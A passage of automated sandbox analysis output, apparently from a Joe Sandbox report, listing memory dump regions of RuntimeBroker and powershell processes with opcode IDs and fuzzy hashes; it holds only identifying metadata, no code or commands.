                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b924b18d6177b970fd20c532a3d6d243b4f526fd2db238d65785931690cc7d53
                          • Instruction ID: eddce0913e019e7d81cdc55dad3528c06985ad4d4ce457cb7443f58c9d81da67
                          • Opcode Fuzzy Hash: b924b18d6177b970fd20c532a3d6d243b4f526fd2db238d65785931690cc7d53
                          • Instruction Fuzzy Hash: 15E08C32C5C6899EE665377468020F67B24FF56744F040272F85CC60C3AE082D68815A
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22acc2d97375639b90af1a93a6fc3586342db47255eb8fc1b615b206002f5e41
                          • Instruction ID: 113c34c8bfa0aeb95d49fdc3d4abfc877f0f2e8b9a04ab378016d1bc08b3cb9c
                          • Opcode Fuzzy Hash: 22acc2d97375639b90af1a93a6fc3586342db47255eb8fc1b615b206002f5e41
                          • Instruction Fuzzy Hash: CDE02621C0EB990FE36573B814BA1A47ED0DF45340F8500FAD448CA1D7EE199CC18345
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca44028ea61f9393cea3569283b5e69f34069442c8e005c7d94422cd3b00f24f
                          • Instruction ID: b02f5d28130dce32f990ef1b49d3a35c39fcf883f545b968ac5133facdbdc2a4
                          • Opcode Fuzzy Hash: ca44028ea61f9393cea3569283b5e69f34069442c8e005c7d94422cd3b00f24f
                          • Instruction Fuzzy Hash: B5D02E3BA0824D0BE3023228E8033E93380EFC03A9F460072DA888E0C2A718090B8068
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 801cc410c9182bf51792b6425af1809bba6feae45afb9a270d20e73c047da0b3
                          • Instruction ID: 9bae9cbb796aa3f67be0197057bd753a1f46ab231b59f111d995674896de8ec5
                          • Opcode Fuzzy Hash: 801cc410c9182bf51792b6425af1809bba6feae45afb9a270d20e73c047da0b3
                          • Instruction Fuzzy Hash: 8CB01230C6F70B89D9793331084246471A0EFC5354FF401B4D80C442C5DA6F98D5C3C6
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2463d65835c1b86fae9c7b7efa440fe16dc80437b4aa78db3b40879f9544116
                          • Instruction ID: 063b254d3e94e7e493b2f065d60269b04ff1f867d36f8062844cdcc493de0791
                          • Opcode Fuzzy Hash: a2463d65835c1b86fae9c7b7efa440fe16dc80437b4aa78db3b40879f9544116
                          • Instruction Fuzzy Hash: 23B01271C0C43A4EE630770480883B513E2DF18391F0402B2D40C932C2CB2C1C825748
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID: /O_^$0O_^
                          • API String ID: 0-2797207476
                          • Opcode ID: 773a05e27ca5d5eab04e6834c2e443d038a5c5e474bdc30678f932d48285cd80
                          • Instruction ID: bb6ce1327b659db15c2b1d574e380d95c774a229cf57e8dcf55631aeceb7174f
                          • Opcode Fuzzy Hash: 773a05e27ca5d5eab04e6834c2e443d038a5c5e474bdc30678f932d48285cd80
                          • Instruction Fuzzy Hash: 4EF1183290D6C68FE755BB2CA8552F53BA0FF52764F0801BBD48DCB1D3DA18AC868395
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5a065d4ae7d06ea1037081533f2555021d8a5ff0e0c6cf738debef6959a9b05
                          • Instruction ID: 8de26bd2b65d8127ad6d6512a47bda92e46f6f27fcf468dd38d47956b5fd3e7b
                          • Opcode Fuzzy Hash: a5a065d4ae7d06ea1037081533f2555021d8a5ff0e0c6cf738debef6959a9b05
                          • Instruction Fuzzy Hash: 9F818871E18A4D9EE788EF2C88993ADBBE1FBA9350F40017AD00DD32D6DF7858468750
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2234278256.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ff849000000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a68a62e3b278c01e72f3b3a184588ab2ff6e7b03b7fd6cac21b4a6d53152afb
                          • Instruction ID: a4227554938a1a9c304c4ab244f0be667f45cf23de6e9e683f34686055a70f57
                          • Opcode Fuzzy Hash: 7a68a62e3b278c01e72f3b3a184588ab2ff6e7b03b7fd6cac21b4a6d53152afb
                          • Instruction Fuzzy Hash: 1BD1F131D1EACA5FEBA5AF2C68546B5BBA1FF46390F1800FAD04DC7193EA18E805C351
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2233897468.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fcff5be8bdf8f46413ce9b98e0f33ca78ada77430d9ac11dc21ae12f696e88e5
                          • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                          • Opcode Fuzzy Hash: fcff5be8bdf8f46413ce9b98e0f33ca78ada77430d9ac11dc21ae12f696e88e5
                          • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45